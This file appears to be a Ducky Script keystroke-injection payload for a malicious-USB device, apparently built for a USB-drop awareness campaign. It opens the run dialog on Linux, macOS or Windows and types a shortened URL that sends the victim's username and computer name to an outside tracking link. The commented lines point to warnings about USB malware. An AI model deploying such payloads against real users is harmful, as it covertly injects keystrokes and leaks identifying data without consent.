REM Linux run dialog
ALT F2
DELAY 200
REM Mac OS run dialog
GUI SPACE
DELAY 200
REM On Windows this changes the input language, so press 3 times
GUI SPACE
DELAY 200
GUI SPACE
DELAY 200
GUI r
DELAY 200
REM On another OS, this could have typed "   r". Backspace 4 times.
DELETE
REPEAT 4
REM Type in URL and open page!
REM STRING https://www.pc-magazin.de/ratgeber/ezigarette-eshisha-bsi-warnung-usb-malware-3196291.html
REM STRING https://www.allianz-fuer-cybersicherheit.de/SharedDocs/Downloads/Webs/ACS/DE/Awareness/Awareness-Grafik_Paket_USB-Stick.jpg?__blob=publicationFile
REM STRING https://us-cert.cisa.gov/ncas/tips/ST08-001
REM stats on https://labb.in/s/ZV88+
REM STRING https://labb.in/s/ZV88
REM tinyurl can attach GET params
STRING https://tinyurl.com/sag3d2?q=%username%&r=%computername%
ENTER
REM go Fullscreen
DELAY 2000
F11